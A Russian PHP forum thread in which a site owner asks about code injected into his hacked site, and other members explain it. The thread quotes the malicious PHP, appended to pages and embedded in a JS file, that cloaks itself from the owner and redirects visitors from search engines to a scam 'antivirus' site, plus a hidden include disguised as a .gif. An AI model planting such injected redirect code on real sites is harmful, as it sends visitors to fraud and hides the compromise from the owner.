Модераторы: skyboy, MoLeX, Aliance, ksnk

Поиск:

Ответ в темуСоздание новой темы Создание опроса
> На html-страницах появился этот код, вирусы? 
:(
    Опции темы
Chai
Дата 10.4.2013, 06:51 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



Загружал уже давно в контент своего сайта обычные html-страницы. Решил пройтись с проверкой по контенту, смотрю, некоторые страницы были недавно изменены (по  дате модификации выявил), а в конце (еще в теле, в самом конце) добавлены такие строки:
Код

if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){
    exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>');

Кроме того, на сервер мне закинули директорию со страницами, раздающими некие сломанные программы)
crack android navitel 5 5
crack cs4 illustrator
crack finereader 10
crack genius driver

И как часто сейчас встречаешь, типичные "комменты счастливых юзверей", вроде как 
А зачем при скачивании файла просит ввести номер? Это бесплатно!?

Той же датой создания/модификации в корне лежал скриптовый файл *.js
Код

function PhotoWindow(pic,param1,param2,param3,param4) {
   if (param4==1){
   var photowin = open("","photowindow","toolbar=0,scrollbars=1,fullscreen=1");
   }
   else {
   var photowin = open("","photowindow","toolbar=0,scrollbars=0,width="+param1+",height="+param2);
   }
   photowin.document.open();
   photowin.document.write("<html>\n");
   photowin.document.write("<title>"+param3+"</title>\n");
   photowin.document.write("<body bgcolor=\"#FFFFFF\" text=\"#003333\" link=\"#0033CC\" vlink=\"#000066\" alink=\"#0099CC\"");
   photowin.document.write("topmargin=\"0\" leftmargin=\"0\" marginheight=\"0\" marginwidth=\"0\">\n");
   photowin.document.write("<a href=\"#\" OnClick=\"self.close()\"><img src=\"/i/"+pic+"\" width="+param1+" height="+param2+" border=0></a><br>\n");
   photowin.document.write("<?
if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){
    exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>');
}
?></body>\n");
   photowin.document.write("</html>");
   photowin.document.close();
   photowin.focus()
}

function CreateNewWindow(page,param) {
    var recWin = open(page,"recWindow",param);
}

function SubmitControl(tocheack){
 if (document.all || document.getElementById){
     for (i=0; i < tocheack.length;i++){
          if(tocheack.elements[i].type.toLowerCase()=="submit"||tocheack.elements[i].type.toLowerCase()=="reset") {
             tocheack.elements[i].disabled = true
            }
         }
    }
}
function CreateWnd(url, width, height, wndname){
  if (wndname != ''){
      for (var i=0; i < parent.frames.length; i++){
           if (parent.frame[i].name == wndname){
               parent.frame[i].focus();
               return;
              }
          }
    }
  window.open(url, wndname,'width=' + width + ',height=' + height + ',resizable=1,scrollbars=yes,menubar=yes,status=yes');
}
function Formchecker(tocheck){
  if (tocheck.intopictitle != null &&tocheck.intopictitle.value.length == 0){
      alert('Пожалуйста, введите название темы!!');
      return false;
      }
  if (tocheck.inpost != null &&tocheck.inpost.value.length == 0){
      alert('Пожалуйста, введите текст сообщения!!');
      return false;
      }
  if (tocheck.membername != null &&tocheck.membername.value.length == 0){
      alert('Пожалуйста, введите ваше имя!!');
      return false;
     }
  if (tocheck.word != null &&tocheck.word.value.length == 0){
      alert('Пожалуйста, задайте значение поиска!!');
      return false;
     }
}
function pasteN(text){
  document.postform.inpost.focus();
  if (text != '') document.postform.inpost.value = document.postform.inpost.value + "" + text + "\n";
}
if (document.selection||document.getSelection) {Q=true} else {var Q=false}
var txt=''
function copyQ() {
txt=''
if (document.getSelection) {txt=document.getSelection()}
else if (document.selection) {txt=document.selection.createRange().text;}
txt='[q]'+txt+'[/q]\n'
}
function pasteQ() {
document.postform.inpost.value=document.postform.inpost.value+txt;
}

function sm(text){
if (text!="") paste(text, 1);
}

function SelectAll (chbox, chtext){
 for(var i =0; i < chbox.form.elements.length; i++){
     if(chbox.form.elements[i].name.indexOf(chtext) == 0){
        chbox.form.elements[i].checked = chbox.checked;
       }
    }
}
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}

function zitata()
{
 if (document.getSelection) {
    var str = document.getSelection()
    if (window.RegExp){
      var regstr = unescape("%20%20")
      var regexp = new RegExp(regstr, "g")
      str = str.replace(regexp, " ")
    }
  } else if (document.selection && document.selection.createRange) {
           var range = document.selection.createRange()
           var str = range.text
         } else var str = "Извините, ваш браузер не поддерживает это."
  document.forms[0].elements[6].value += '[q]'+str+'[/q]'
}
function GetId(objform, objinput){
var unid;
if(navigator.appName == "Microsoft Internet Explorer") {
document.writeln('<OBJECT classid="clsid:22D6F312-B0F6-11D0-94AB-0080C74C7E95" ID=WMP WIDTH=1 HEIGHT=1></OBJECT>');
if(typeof(document.WMP) == "object" && typeof(document.WMP.ClientID) == "string") {unid = document.WMP.ClientID;}
else {unid = "None";}}
else {document.writeln('<EMBED TYPE="application/x-mplayer2" NAME=WMP WIDTH=2 HEIGHT=2></EMBED><br><br>');
setTimeout("NSShow()", 100);}
document.writeln('<input type="hidden" name="'+objinput+'">');
eval("document."+objform+"."+objinput+".value = unid");}
function NSShow(){
if(typeof(document.WMP) == "object"){unid = document.WMP.GetClientID();}
else {unid = "None";}
return;}



Довески убрал, но чо за код был в конце страниц, что он делает? Может, где еще проверить надо? И какие функции выполнял скриптовый файл? Я хочу выяснить, может, еще кто проник, кто за свой собственный хостинг платить не  хочет?

Это сообщение отредактировал(а) Chai - 10.4.2013, 06:53
PM MAIL   Вверх
Чучмек
Дата 10.4.2013, 11:13 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


НЭТ БИЛЭТ
**


Профиль
Группа: Участник
Сообщений: 841
Регистрация: 11.5.2008
Где: СССР

Репутация: 4
Всего: 41



Chai, тебя взломали.
Цитата(Chai @  10.4.2013,  06:51 Найти цитируемый пост)
но чо за код был в конце страниц, что он делает

Проверяет откуда был переход - если переход был и  не со страницы твоего сайта - перекидывает на base-file 


Это сообщение отредактировал(а) Чучмек - 10.4.2013, 11:34


--------------------
умную мысль держи при себе, а дурной - поделись с другими 
PM MAIL   Вверх
Chai
Дата 10.4.2013, 19:47 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



А почему им так важно, чтобы переход был не со страниц моего сайта? Что за ребятки эти? 

Здесь он помечен в блэклисте. Так что я прям боюсь перейти, чтобы на них полюбоваться.

Добавлено через 3 минуты и 44 секунды
Блин, буду писать гневное письмо хостеру, что его антивирь, которым он регулярно проверяет контент, в упор не видит ни редиректов в хтакцессе, ни в этих довесках.
PM MAIL   Вверх
Sanchezzz
Дата 10.4.2013, 19:57 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Завсегдатай
Сообщений: 1670
Регистрация: 19.11.2006
Где: Voronezh

Репутация: 41
Всего: 60



Ну скорее всего он ответит что у вас дрявые скрипты.


--------------------
Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS.
PM MAIL Skype GTalk   Вверх
Chai
Дата 10.4.2013, 20:06 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



Хех, там из скриптов есть только классический phpBB3. На эту отмазку напишу ихнему главному. Им уже написал. Зачем нужна такая проверка, если она не находит эти гадости? Чем они проверяют, не знаю, а только один раз нашли PHP-вирус, а эти не находят. А ведь достаточно посмотреть в блэклисты, они не скрываются.
PM MAIL   Вверх
Чучмек
Дата 10.4.2013, 20:45 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


НЭТ БИЛЭТ
**


Профиль
Группа: Участник
Сообщений: 841
Регистрация: 11.5.2008
Где: СССР

Репутация: 4
Всего: 41



Цитата(Chai @  10.4.2013,  19:47 Найти цитируемый пост)
А почему им так важно, чтобы переход был не со страниц моего сайта? 

Чтобы ты не догадался.
Если вести адрес в браузер и переходить со страницы на страницу - все Ок.
А если перейти на твой сайт по внешней ссылке,с поисковика например, то перекинет.

Добавлено через 3 минуты и 15 секунд
Цитата(Chai @  10.4.2013,  19:47 Найти цитируемый пост)
Так что я прям боюсь перейти, чтобы на них полюбоваться.

А че боятся? Компьютер не взорвется. 
Говорят у вас типа вирусы и предлагают проверить комп за SMS. 


--------------------
умную мысль держи при себе, а дурной - поделись с другими 
PM MAIL   Вверх
Sanchezzz
Дата 10.4.2013, 23:15 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Завсегдатай
Сообщений: 1670
Регистрация: 19.11.2006
Где: Voronezh

Репутация: 41
Всего: 60



Чаще и за дырок форумов и закачивают шелы, особенно если они крякнутые=).


--------------------
Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS.
PM MAIL Skype GTalk   Вверх
Chai
Дата 11.4.2013, 06:53 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



Щас набрал в браузере адрес одной из страниц сайта и выполнил переход на нее.
Как она выглядит запечатлел во вложении, а код внизу нее такой
<?
require_once($_SERVER['DOCUMENT_ROOT'].'/group/case/mn_t.gif');
?>

<?
if(isset($_SERVER['HTTP_REFERER']) && !preg_match("|^http://$_SERVER[HTTP_HOST]|i", $_SERVER['HTTP_REFERER'])){
    exit( '<script>setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);</script>');
}
?></body>
</html>

Переход на base-file.com почему-то не выполнился. Почему?


Присоединённый файл ( Кол-во скачиваний: 9 )
Присоединённый файл  Низ_зараженной_страницы.JPG 12,35 Kb
PM MAIL   Вверх
krypt3r
Дата 11.4.2013, 07:10 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Опытный
**


Профиль
Группа: Участник
Сообщений: 359
Регистрация: 9.6.2009

Репутация: 3
Всего: 16



Цитата
Чаще и за дырок форумов и закачивают шелы, особенно если они крякнутые=). 

Кто крякнутый? Шелл или бесплатный phpBB?
PM MAIL   Вверх
MoLeX
Дата 11.4.2013, 07:34 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Местный пингвин
****


Профиль
Группа: Модератор
Сообщений: 4076
Регистрация: 17.5.2007

Репутация: 46
Всего: 140



видно же что js скрипт не сработал.


--------------------
Amazing  smile 
PM MAIL WWW ICQ   Вверх
Sanchezzz
Дата 11.4.2013, 10:40 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Эксперт
***


Профиль
Группа: Завсегдатай
Сообщений: 1670
Регистрация: 19.11.2006
Где: Voronezh

Репутация: 41
Всего: 60



Это в общем плане вы используете то что используют очень большое количество людей, каждая дырка даже в бесплатном форуме это угроза всему сайту.
Платные формы или крякнутые имеют уйму дыр.


--------------------
Понравился ответ "+" по репе, не забываем закрывать тему, заказы в LS.
PM MAIL Skype GTalk   Вверх
Chai
Дата 11.4.2013, 15:15 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



Цитата(MoLeX @ 11.4.2013,  07:34)
видно же что js скрипт не сработал.

А, точно, я ж его прибил в корне еще ранее.

Мне щас коллега сказал, что на его форум новый юзер поимел права админа, потому что зашел в браузере в каком-то лине. Форум от SMF. Как это может быть, в линях что-то иначе исполняется?

Это сообщение отредактировал(а) Chai - 11.4.2013, 15:17
PM MAIL   Вверх
Aliance
Дата 11.4.2013, 18:34 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


I ♥ <script>
****


Профиль
Группа: Модератор
Сообщений: 6418
Регистрация: 2.8.2004
Где: spb

Репутация: 14
Всего: 137



Цитата(Chai @  11.4.2013,  16:15 Найти цитируемый пост)
лине

в чем?
PM MAIL WWW ICQ Skype   Вверх
Chai
Дата 11.4.2013, 19:28 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Новичок



Профиль
Группа: Участник
Сообщений: 42
Регистрация: 12.10.2012

Репутация: нет
Всего: нет



В линуксе. 
PM MAIL   Вверх
MoLeX
Дата 12.4.2013, 05:35 (ссылка) | (нет голосов) Загрузка ... Загрузка ... Быстрая цитата Цитата


Местный пингвин
****


Профиль
Группа: Модератор
Сообщений: 4076
Регистрация: 17.5.2007

Репутация: 46
Всего: 140



))))))
взлом сайта через линкус. забавно


--------------------
Amazing  smile 
PM MAIL WWW ICQ   Вверх
Ответ в темуСоздание новой темы Создание опроса
Правила форума "PHP"
Aliance
IZ@TOP
skyboy
SamDark
MoLeX

Новичкам:

  • PHP редакторы собираются и обсуждаются здесь
  • Электронные книги по PHP, документацию можно найти здесь
  • Интерпретатор PHP, полную документацию можно скачать на PHP.NET

Важно:

  • Не брезгуйте пользоваться тегами [code=php]КОД[/code] для повышения читабельности текста/кода.
  • Перед созданием новой темы воспользуйтесь поиском и загляните в FAQ
  • Действия модераторов можно обсудить здесь

Внимание:

  • Темы "ищу скрипт", "подскажите скрипт" и т.п. будут переноситься в форум "Web-технологии"
  • Темы с именами: "Срочно", "помогите", "не знаю как делать" будут УДАЛЯТЬСЯ

Если Вам понравилась атмосфера форума, заходите к нам чаще! С уважением, IZ@TOP, skyboy, SamDark, MoLeX, awers.

 
0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема | PHP: Общие вопросы | Следующая тема »


 




[ Время генерации скрипта: 0.0624 ]   [ Использовано запросов: 22 ]   [ GZIP включён ]


Реклама на сайте     Информационное спонсорство

 
По вопросам размещения рекламы пишите на vladimir(sobaka)vingrad.ru
Отказ от ответственности     Powered by Invision Power Board(R) 1.3 © 2003  IPS, Inc.